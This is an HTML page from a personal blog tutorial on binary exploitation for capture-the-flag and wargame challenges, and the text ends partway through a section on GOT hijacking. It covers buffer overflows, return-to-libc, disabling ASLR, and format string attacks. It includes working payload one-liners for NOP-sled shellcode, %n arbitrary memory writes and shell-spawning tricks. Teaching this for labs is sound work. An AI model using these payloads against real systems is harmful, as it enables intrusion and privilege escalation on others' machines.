LFCBinaryExploitation.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <script type="text/javascript">

      var _gaq = _gaq || [];
      _gaq.push(['_setAccount', 'UA-92365403-1']);
      _gaq.push(['_trackPageview']);

      (function() {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
      })();
    </script>
    <title>Learning from the CTF : Binary Exploitation &#8212; tech.bitvijays.com</title>
    
    <link rel="stylesheet" href="_static/sphinxdoc.css" type="text/css" />
    <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
    
    <script type="text/javascript">
      var DOCUMENTATION_OPTIONS = {
        URL_ROOT:    './',
        VERSION:     '0.1',
        COLLAPSE_INDEX: false,
        FILE_SUFFIX: '.html',
        HAS_SOURCE:  true
      };
    </script>
    <script type="text/javascript" src="_static/jquery.js"></script>
    <script type="text/javascript" src="_static/underscore.js"></script>
    <script type="text/javascript" src="_static/doctools.js"></script>
    <link rel="search" title="Search" href="search.html" />
    <link rel="top" title="tech.bitvijays.com" href="index.html" />
    <link rel="next" title="Learning from the CTF : Forensics" href="LFCForensics.html" />
    <link rel="prev" title="Learning from the CTF : Reverse Engineering" href="LFCReverseEngineering.html" /> 
  </head>
  <body role="document">
    <div class="related" role="navigation" aria-label="related navigation">
      <h3>Navigation</h3>
      <ul>
        <li class="right" style="margin-right: 10px">
          <a href="LFCForensics.html" title="Learning from the CTF : Forensics"
             accesskey="N">next</a></li>
        <li class="right" >
          <a href="LFCReverseEngineering.html" title="Learning from the CTF : Reverse Engineering"
             accesskey="P">previous</a> |</li>
        <li class="nav-item nav-item-0"><a href="index.html">tech.bitvijays.com</a> &#187;</li> 
      </ul>
    </div>
      <div class="sphinxsidebar" role="navigation" aria-label="main navigation">
        <div class="sphinxsidebarwrapper">
  <h3><a href="index.html">Table Of Contents</a></h3>
  <ul>
<li><a class="reference internal" href="#">Learning from the CTF : Binary Exploitation</a><ul>
<li><a class="reference internal" href="#basics">Basics</a></li>
<li><a class="reference internal" href="#buffer-overflow">Buffer overflow</a></li>
<li><a class="reference internal" href="#format-string-vulnerability">Format String Vulnerability</a></li>
<li><a class="reference internal" href="#buffer-overflow-examples">Buffer Overflow Examples</a></li>
<li><a class="reference internal" href="#format-string-examples">Format String Examples</a></li>
<li><a class="reference internal" href="#miscellanous-examples">Miscellanous Examples</a></li>
</ul>
</li>
</ul>

  <h4>Previous topic</h4>
  <p class="topless"><a href="LFCReverseEngineering.html"
                        title="previous chapter">Learning from the CTF : Reverse Engineering</a></p>
  <h4>Next topic</h4>
  <p class="topless"><a href="LFCForensics.html"
                        title="next chapter">Learning from the CTF : Forensics</a></p>
  <h3>This Page</h3>
  <ul class="this-page-menu">
    <li><a href="_sources/LFCBinaryExploitation.txt"
           rel="nofollow">Show Source</a></li>
    <li><a href="https://github.com/bitvijays/bitvijays.github.io-sphinx/blob/master/docs/LFCBinaryExploitation.rst"
           rel="nofollow">Show on GitHub</a></li>
    <li><a href="https://github.com/bitvijays/bitvijays.github.io-sphinx/edit/master/docs/LFCBinaryExploitation.rst"
           rel="nofollow">Edit on GitHub</a></li>
  </ul>
<div id="searchbox" style="display: none" role="search">
  <h3>Quick search</h3>
    <form class="search" action="search.html" method="get">
      <div><input type="text" name="q" /></div>
      <div><input type="submit" value="Go" /></div>
      <input type="hidden" name="check_keywords" value="yes" />
      <input type="hidden" name="area" value="default" />
    </form>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
        </div>
      </div>

    <div class="document">
      <div class="documentwrapper">
        <div class="bodywrapper">
          <div class="body" role="main">
            
  <div class="section" id="learning-from-the-ctf-binary-exploitation">
<h1>Learning from the CTF : Binary Exploitation<a class="headerlink" href="#learning-from-the-ctf-binary-exploitation" title="Permalink to this headline">¶</a></h1>
<p>This post (Work in Progress) lists the tips and tricks while doing Binary Exploitation challenges during various CTF&#8217;s and Over The Wire Wargame.</p>
<p><strong>Thanks to superkojiman, barrebas, et0x who helped me learning the concepts.</strong></p>
<div class="section" id="basics">
<h2>Basics<a class="headerlink" href="#basics" title="Permalink to this headline">¶</a></h2>
<p>Let&#8217;s start with some basic concepts and then we would see some examples which would help to clear the concepts.</p>
<ul class="simple">
<li>Big-endian systems store the most significant byte of a word in the smallest address and the least significant byte is stored in the largest address. Little-endian systems, in contrast, store the least significant byte in the smallest address. {% img left /images/big-endian.png 250 250 %} {% img right /images/little-endian.png 250 250 %}</li>
<li>When you get a binary for exploitation, we need to find whether it is 32-bit or 64-bit ELF, which platform it is running, whether any buffer overflow prevention techniques has been used, what is EIP offset.</li>
</ul>
<blockquote>
<div><ul class="simple">
<li>Executable binary is running on whether x86 or x86-64.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">uname</span> <span class="o">-</span><span class="n">a</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Whether the binary is compiled for 32 bit or 64 bit.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">file</span> <span class="n">binary_file</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Multiple Buffer overflow prevention techniques such as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout Randomization (ASLR) and Position Independent Executables (PIE).</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">Address</span> <span class="n">space</span> <span class="n">Layout</span> <span class="n">Randomization</span>     <span class="p">:</span> <span class="n">Kernel</span>
<span class="n">Executable</span> <span class="n">Stack</span> <span class="n">Protection</span>            <span class="p">:</span> <span class="n">Compiler</span>
<span class="n">Stack</span> <span class="n">smashing</span> <span class="n">protection</span>              <span class="p">:</span> <span class="n">Compiler</span>
<span class="n">Position</span> <span class="n">Independent</span> <span class="n">Executables</span>       <span class="p">:</span> <span class="n">Compiler</span>
<span class="n">Fortify</span> <span class="n">Source</span>                         <span class="p">:</span> <span class="n">Compiler</span>
<span class="n">Stack</span> <span class="n">Protector</span>                        <span class="p">:</span> <span class="n">Compiler</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Which buffer overflow prevention techniques are used can be found by running Checksec Script. This script is present in gdb-peda.</li>
<li>Whether the stack of binary is executable is not can be found by readelf tool. If Program header GNU_STACK has RWE flag, if it has E flag, it&#8217;s executable.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span>narnia8@melinda:~$ readelf -l /narnia/narnia8 | grep GNU_STACK
GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10
</pre></div>
</div>
<p>In order to make the stack executable, the program needs to be compiled with -z execstack option and to disable stack smashing option -fno-stack-protector should be used.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">gcc</span> <span class="o">-</span><span class="n">ggdb</span> <span class="o">-</span><span class="n">m32</span> <span class="o">-</span><span class="n">fno</span><span class="o">-</span><span class="n">stack</span><span class="o">-</span><span class="n">protector</span> <span class="o">-</span><span class="n">z</span> <span class="n">execstack</span> <span class="o">-</span><span class="n">o</span> <span class="n">buffer1</span> <span class="n">buffer1</span><span class="o">.</span><span class="n">c</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Address Space Layout Randomization (ASLR) controlled by /proc/sys/kernel/randomize_va_space.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">Three</span> <span class="n">Values</span><span class="p">:</span>
<span class="mi">0</span>  <span class="p">:</span> <span class="n">Disable</span> <span class="n">ASLR</span><span class="o">.</span> <span class="n">This</span> <span class="n">setting</span> <span class="ow">is</span> <span class="n">applied</span> <span class="k">if</span> <span class="n">the</span> <span class="n">kernel</span> <span class="ow">is</span> <span class="n">booted</span> <span class="k">with</span> <span class="n">the</span> <span class="n">norandmaps</span> <span class="n">boot</span> <span class="n">parameter</span><span class="o">.</span>
<span class="mi">1</span>  <span class="p">:</span> <span class="n">Randomize</span> <span class="n">the</span> <span class="n">positions</span> <span class="n">of</span> <span class="n">the</span> <span class="n">stack</span><span class="p">,</span> <span class="n">virtual</span> <span class="n">dynamic</span> <span class="n">shared</span> <span class="nb">object</span> <span class="p">(</span><span class="n">VDSO</span><span class="p">)</span> <span class="n">page</span><span class="p">,</span> <span class="ow">and</span> <span class="n">shared</span> <span class="n">memory</span> <span class="n">regions</span><span class="o">.</span> <span class="n">The</span> <span class="n">base</span> <span class="n">address</span> <span class="n">of</span> <span class="n">the</span> <span class="n">data</span> <span class="n">segment</span> <span class="ow">is</span> <span class="n">located</span> <span class="n">immediately</span> <span class="n">after</span> <span class="n">the</span> <span class="n">end</span> <span class="n">of</span> <span class="n">the</span> <span class="n">executable</span> <span class="n">code</span> <span class="n">segment</span><span class="o">.</span>
<span class="mi">2</span>  <span class="p">:</span> <span class="n">Randomize</span> <span class="n">the</span> <span class="n">positions</span> <span class="n">of</span> <span class="n">the</span> <span class="n">stack</span><span class="p">,</span> <span class="n">VDSO</span> <span class="n">page</span><span class="p">,</span> <span class="n">shared</span> <span class="n">memory</span> <span class="n">regions</span><span class="p">,</span> <span class="ow">and</span> <span class="n">the</span> <span class="n">data</span> <span class="n">segment</span><span class="o">.</span> <span class="n">This</span> <span class="ow">is</span> <span class="n">the</span> <span class="n">default</span> <span class="n">setting</span><span class="o">.</span>
</pre></div>
</div>
<p>You can change the setting temporarily by writing a new value to /proc/sys/kernel/randomize_va_space, for example:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">echo</span> <span class="n">value</span> <span class="o">&gt;</span> <span class="o">/</span><span class="n">proc</span><span class="o">/</span><span class="n">sys</span><span class="o">/</span><span class="n">kernel</span><span class="o">/</span><span class="n">randomize_va_space</span>
</pre></div>
</div>
<p>To change the value permanently, add the setting to /etc/sysctl.conf, for example:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">kernel</span><span class="o">.</span><span class="n">randomize_va_space</span> <span class="o">=</span> <span class="n">value</span>
<span class="ow">and</span> <span class="n">run</span> <span class="n">the</span> <span class="n">sysctl</span> <span class="o">-</span><span class="n">p</span> <span class="n">command</span><span class="o">.</span>
</pre></div>
</div>
<p>If you change the value of randomize_va_space, you should test your application stack to ensure that it is compatible with the new setting. If necessary, you can disable ASLR for a specific program and its child processes by using the following command:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>% setarch `uname -m` -R program [args ...]
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>To know the EIP offset, you can use cyclic patterns. Use pattern_create.rb to create a random pattern which can be used to find the offset and pattern_offset.rb to find the exact offset.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">share</span><span class="o">/</span><span class="n">metasploit</span><span class="o">-</span><span class="n">framework</span><span class="o">/</span><span class="n">tools</span><span class="o">/</span><span class="n">pattern_create</span><span class="o">.</span><span class="n">rb</span> <span class="mi">200</span>
<span class="n">Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag</span>

<span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">share</span><span class="o">/</span><span class="n">metasploit</span><span class="o">-</span><span class="n">framework</span><span class="o">/</span><span class="n">tools</span><span class="o">/</span><span class="n">pattern_offset</span><span class="o">.</span><span class="n">rb</span> <span class="mh">0x37654136</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Exact</span> <span class="n">match</span> <span class="n">at</span> <span class="n">offset</span> <span class="mi">140</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Sometimes, you need to know the address of the variable, inorder to write arbitary value in to it.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">run</span> <span class="n">gdb</span> <span class="o">&lt;</span><span class="n">program</span><span class="o">&gt;</span> <span class="n">p</span> <span class="o">&amp;&lt;</span><span class="n">variablename</span><span class="o">&gt;</span>
</pre></div>
</div>
</div></blockquote>
</div></blockquote>
</div>
<div class="section" id="buffer-overflow">
<h2>Buffer overflow<a class="headerlink" href="#buffer-overflow" title="Permalink to this headline">¶</a></h2>
<ul class="simple">
<li>Either you can put the shellcode on the buffer and then redirect the EIP to NOP Sled followed by the shellcode (provided the shellcode used is correct and the stack is executable).</li>
<li>However, if the stack is not executable or the shellcode is not working (happens sometimes), then we can either,</li>
</ul>
<blockquote>
<div><ul class="simple">
<li>Export a environment variable with shellcode, find the address of env variable in the stack and then set the return address to starting of the shellcode and get a shell</li>
<li>Use return2libc which is a type of ROP: find the address of system function, find the address of &#8220;/bin/sh&#8221; in the stack and execute it like system(&#8220;/bin/sh&#8221;). It is in the format of</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="o">&lt;</span><span class="n">ADDRofSYSTEM</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="mi">4</span><span class="n">ArbitraryBytes</span> <span class="k">for</span> <span class="n">Return</span> <span class="n">Address</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="n">argument</span> <span class="k">for</span> <span class="n">system</span><span class="p">[</span><span class="o">/</span><span class="nb">bin</span><span class="o">/</span><span class="n">sh</span><span class="p">]</span><span class="o">&gt;</span>
</pre></div>
</div>
<p>4Arbitrary Bytes for Return address could be a JUNK address or &#8220;\xCC\xCC\xCC\xCC&#8221; or address of exit function.</p>
<p>If set to</p>
<ul class="simple">
<li>\xCC\xCC\xCC\xCC so after system executes, it tries to return to 0xcccccccc. \xcc is good just to check if you&#8217;re actually jumping to your shellcode, but once you&#8217;ve verified that it works, then you should remove it.</li>
<li>If a JUNK address is put, the binary will have already executed the shellcode but it will segfault.</li>
<li>If the proper address of exit() is used, binary will exit cleanly.</li>
</ul>
<p>It&#8217;s better to use /bin/sh instead of /bin/bash since bash drops privs. If /bin/bash is used, it will launch /bin/bash but you&#8217;ll find that you haven&#8217;t elevated your privileges and this can get confusing. so either find another string that points to /bin/sh or set your own env variable like DASH=/bin/sh and reference that. Good paper to review is Bypassing non-executable-stack during Exploitation (return-to-libc).</p>
</div></blockquote>
<ul>
<li><p class="first">Sometimes you need to put a cat to keep the shell alive</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">(</span><span class="n">cat</span> <span class="nb">input</span><span class="p">;</span> <span class="n">cat</span><span class="p">)</span> <span class="o">|</span> <span class="o">./</span><span class="n">binary</span> <span class="nb">input</span> <span class="ow">is</span> <span class="n">the</span> <span class="n">payload</span> <span class="n">you</span> <span class="n">are</span> <span class="n">sending</span><span class="o">.</span>
</pre></div>
</div>
</li>
</ul>
</div></blockquote>
<ul class="simple">
<li>Sometimes we need a shellcode to write a string or for getting a actual shell. A good reference can be found &#64;Introduction to Writing Shellcode. Information about various system call integar value need to be present in EAX register is here Linux System Call Table.</li>
</ul>
<blockquote>
<div><p>Let&#8217;s see a small example where we move an address to eax register and jump to it. Address which we are moving to eax would contain our shellcode.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">;</span><span class="n">test</span><span class="o">.</span><span class="n">asm</span>
<span class="p">[</span><span class="n">SECTION</span> <span class="o">.</span><span class="n">text</span><span class="p">]</span>
<span class="k">global</span> <span class="n">_start</span>
<span class="n">_start</span><span class="p">:</span>
        <span class="n">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="mh">0xffffd8bc</span>
      <span class="n">jmp</span> <span class="n">eax</span>
</pre></div>
</div>
<p>Just good to know: global directive is NASM specific. It is for exporting symbols in your code to where it points in the object code generated. Here you mark _start symbol global so its name is added in the object code (a.o). The linker (ld) can read that symbol in the object code and its value so it knows where to mark as an entry point in the output executable. When you run the executable it starts at where marked as _start in the code.</p>
<p>If a global directive missing for a symbol that symbol will not be placed in the object code&#8217;s export table so linker has no way of knowing about the symbol. We can compile the asm file by</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">nasm</span> <span class="o">-</span><span class="n">f</span> <span class="n">elf</span> <span class="n">test</span><span class="o">.</span><span class="n">asm</span>
</pre></div>
</div>
<p>link it</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">ld</span> <span class="o">-</span><span class="n">o</span> <span class="n">test</span> <span class="n">test</span><span class="o">.</span><span class="n">o</span>
</pre></div>
</div>
<p>If you get the below error</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>ld: i386 architecture of input file `test.o&#39; is incompatible with i386:x86-64 output
</pre></div>
</div>
<p>either</p>
<p>Use 64 bits instead of 32 for your loader and compile it with the following command:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">nasm</span> <span class="o">-</span><span class="n">f</span> <span class="n">elf64</span> <span class="n">loader</span><span class="o">.</span><span class="n">asm</span> <span class="o">-</span><span class="n">o</span> <span class="n">loader</span><span class="o">.</span><span class="n">o</span>
</pre></div>
</div>
<p>or</p>
<p>If want compile the file as 32 bits composition, you can use:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">ld</span> <span class="o">-</span><span class="n">m</span> <span class="n">elf_i386</span> <span class="o">-</span><span class="n">s</span> <span class="o">-</span><span class="n">o</span> <span class="n">file</span><span class="o">.</span><span class="n">o</span> <span class="n">file</span>
</pre></div>
</div>
<p>To see the byte code</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">objdump</span> <span class="o">-</span><span class="n">d</span> <span class="o">&lt;</span><span class="n">file</span><span class="o">&gt;</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>What we mostly do when exploiting a buffer overflow (when placing the shellcode on stack) is we place our shellcode before EIP, we should also check if we can put our shellcode after EIP. This is particularly useful when some kind of check for shellcode is present in address before EIP. Example: Suppose our EIP is present at offset 80. We would usually do</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">&#39;print &quot;</span><span class="se">\x90</span><span class="s1">&quot;*50 + &quot;30 Bytes of ShellCode&quot; + &quot;4 Bytes return address to NOP or shellcode in left&quot;&#39;</span>
</pre></div>
</div>
<p>However, if somekind of check for alphanumeric characters is present for first 80 bytes you won&#8217;t be able to put your shellcode in those 80 bytes. At that point of time you should check if you can overflow post EIP and redirect. For example</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">&#39;print &quot;A&quot;*80 + &quot;4 Bytes return address to NOP or shellcode in right&quot; + &quot;</span><span class="se">\x90</span><span class="s1">&quot;*50 + &quot;30 Bytes of ShellCode&quot;&#39;</span>
</pre></div>
</div>
</div></blockquote>
</div>
<div class="section" id="format-string-vulnerability">
<h2>Format String Vulnerability<a class="headerlink" href="#format-string-vulnerability" title="Permalink to this headline">¶</a></h2>
<ul class="simple">
<li>Definition: If an attacker is able to provide the format string to an ANSI C format function in part or as a whole, a format string vulnerability is present. By doing so, the behaviour of the format function is changed, and the attacker may get control over the target application. A format string is an ASCIIZ string that contains text and format parameters. Example:</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">printf</span> <span class="p">(</span><span class="s2">&quot;The magic number is: </span><span class="si">%d</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="mi">1911</span><span class="p">);</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">printf</span> <span class="p">(</span><span class="s2">&quot;Number </span><span class="si">%d</span><span class="s2"> has no address, number </span><span class="si">%d</span><span class="s2"> has: </span><span class="si">%08x</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">a</span><span class="p">);</span>
</pre></div>
</div>
<p>From within the printf function the stack looks like:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">stack</span> <span class="n">top</span>
<span class="o">.</span> <span class="o">.</span> <span class="o">.</span>
<span class="o">&lt;&amp;</span><span class="n">a</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="n">a</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="n">i</span><span class="o">&gt;</span>
 <span class="n">A</span>
<span class="o">.</span> <span class="o">.</span> <span class="o">.</span>
<span class="n">stack</span> <span class="n">bottom</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Crashing the Program: By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like:</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">printf</span> <span class="p">(</span><span class="s2">&quot;</span><span class="si">%s%s%s%s%s%s%s%s%s%s%s%s</span><span class="s2">&quot;</span><span class="p">);</span>
</pre></div>
</div>
<p>Because ‘%s’ displays memory from an address that is supplied on the stack, where a lot of other data is stored, too, our chances are high to read from an illegal address, which is not mapped.</p>
</div></blockquote>
<ul class="simple">
<li>Viewing the stack: how some parts of the stack memory by using a format string like this:</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">printf</span> <span class="p">(</span><span class="s2">&quot;</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
</pre></div>
</div>
<p>This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="mf">40012980.080628</span><span class="n">c4</span><span class="o">.</span><span class="n">bffff7a4</span><span class="o">.</span><span class="mf">00000005.08059</span><span class="n">c04</span>
</pre></div>
</div>
<p>This is a partial dump of the stack memory, starting from the current bottom upward to the top of the stack — assuming the stack grows towards the low addresses.</p>
</div></blockquote>
<ul class="simple">
<li>Viewing Memory at any location: We can look at memory locations different from the stack memory by providing an address to the format string.</li>
</ul>
<blockquote>
<div><p>Our format string is usually located on the stack itself, so we already have near to full control over the space, where the format string lies. The format function internally maintains a pointer to the stack location of the current format parameter. If we would be able to get this pointer pointing into a memory space we can control, we can supply an address to the ‘%s’ parameter. To modify the stack pointer we can simply use dummy parameters that will ‘dig’ up the stack by printing junk:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">printf</span> <span class="p">(</span><span class="s2">&quot;AAA0AAA1_</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">&quot;</span><span class="p">);</span>
</pre></div>
</div>
<p>The ‘%08x’ parameters increase the internal stack pointer of the format function towards the top of the stack. After more or less of this increasing parameters the stack pointer points into our memory: the format string itself. The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it lies above the current stack pointer for sure. If we choose the number of ‘%08x’ parameters correctly, we could just display memory from an arbitrary address, by appending ‘%s’ to our string. In our case the address is illegal and would be ‘AAA0’. Lets replace it with a real one. Example:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">address</span> <span class="o">=</span> <span class="mh">0x08480110</span>
<span class="n">address</span> <span class="p">(</span><span class="n">encoded</span> <span class="k">as</span> <span class="mi">32</span> <span class="n">bit</span> <span class="n">le</span> <span class="n">string</span><span class="p">):</span> <span class="s2">&quot;</span><span class="se">\x10\x01\x48\x08</span><span class="s2">&quot;</span>
<span class="n">printf</span> <span class="p">(</span><span class="s2">&quot;</span><span class="se">\x10\x01\x48\x08</span><span class="s2">_</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">|</span><span class="si">%s</span><span class="s2">|&quot;</span><span class="p">);</span>
</pre></div>
</div>
<p>Will dump memory from 0x08480110 until a NUL byte is reached. If we cannot reach the exact format string boundary by using 4-Byte pops (‘%08x’), we have to pad the format string, by prepending one, two or three junk characters. 3 This is analog to the alignment in buffer overflow exploits.</p>
</div></blockquote>
<ul class="simple">
<li>Overwriting of Arbitrary Memory: There is the ‘%n’ parameter, which writes the number of bytes already printed, into a variable of our choice. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. But if we supply a correct mapped and writeable address this works and we overwrite four bytes (sizeof (int)) at the address:</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="s2">&quot;</span><span class="se">\xc0\xc8\xff\xbf</span><span class="s2">_</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.</span><span class="si">%08x</span><span class="s2">.%n&quot;</span>
</pre></div>
</div>
<p>The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. We have reached one of our goals: we can write to arbitrary addresses. By using a dummy parameter ‘%nu’ we are able to control the counter written by ‘%n’, at least a bit.</p>
</div></blockquote>
<ul class="simple">
<li>Direct Parameter Access: The direct parameter access is controlled by the ‘$&#8217; qualifier</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">printf</span> <span class="p">(</span><span class="s2">&quot;%6`\ d:raw-latex:`</span><span class="se">\n</span><span class="s2">`&quot;</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
</pre></div>
</div>
<p>Prints ‘1’, because the ‘6$’ explicitly addresses the 6th parameter on the stack.</p>
</div></blockquote>
<ul class="simple">
<li>The above text is taken from and a good paper to read for format string is <a class="reference external" href="http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/Format_String/files/formatstring-1.2.pdf">Exploiting Format String Vulnerabilities</a></li>
</ul>
<blockquote>
<div></div></blockquote>
<ul class="simple">
<li>We can write two bytes by %hn and one byte by %hhn.</li>
<li>How to write four bytes? Suppose we need to write 0x8048706 to the address 0xffffd64c.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span>HOB:0x0804 LOB:0x8706

If HOB &lt; LOB

[addr+2][addr] = \x4e\xd\xff\xff\x4c\xd\xff\xff
%.[HOB - 8]x = 0x804 - 8 = 7FC (2044) = %.2044x
%[offset]$hn = %6\$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 7F02 (32514) = %.32514x
%[offset+1]`\ hn = %7$hn

python -c &#39;print &quot;\x4e\xd6\xff\xff\x4c\xd6\xff\xff&quot; +&quot;%.2044x%6\$hn %.32514x%7\$hn&quot;&#39;
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Hijack the Global Offset Table with pointers:</li>
</ul>
<blockquote>
<div><ul class="simple">
<li>Whatis: The Global Offset Table redirects position independent address calculations to an absolute location and is located in the .got section of an ELF executable or shared object. It stores the final (absolute) location of a function calls symbol, used in dynamically linked code. When a program requests to use printf() for instance, after the rtld locates the symbol, the location is then relocated in the GOT and allows for the executable via the Procedure Linkage Table, to directly access the symbols location.</li>
<li>when you disassemble main and printf statement is present, you will get like</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="mh">0x080484b9</span> <span class="o">&lt;+</span><span class="mi">60</span><span class="o">&gt;</span><span class="p">:</span> <span class="n">call</span> <span class="mh">0x8048330</span> <span class="n">printf</span><span class="nd">@plt</span> <span class="o">&lt;----</span><span class="n">PLT</span>
</pre></div>
</div>
<p>if you further disassemble printf</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>gdb-peda$ pdisass printf
Dump of assembler code for function printf@plt:
    0x08048330 &lt;+0&gt;: jmp DWORD PTR ds:0x8049788 &lt;----GOT Address
    0x08048336 &lt;+6&gt;: push 0x0
    0x0804833b &lt;+11&gt;: jmp 0x8048320 End of assembler dump.
</pre></div>
</div>
<p>Further disassembling the address 0x8049788</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>gdb-peda$ pdisass 0x8049788
Dump of assembler code from 0x8049788 to 0x80497a8:
  0x08049788 &lt;printf@got.plt+0&gt;:   add    DWORD PTR ss:[eax+ecx*1],0x46
  0x0804978d &lt;fgets@got.plt+1&gt;:    add    DWORD PTR [eax+ecx*1],0x56
  0x08049791 &lt;puts@got.plt+1&gt;: add    DWORD PTR [eax+ecx*1],0x66
  0x08049795 &lt;__gmon_start__@got.plt+1&gt;:   add    DWORD PTR [eax+ecx*1],0x76
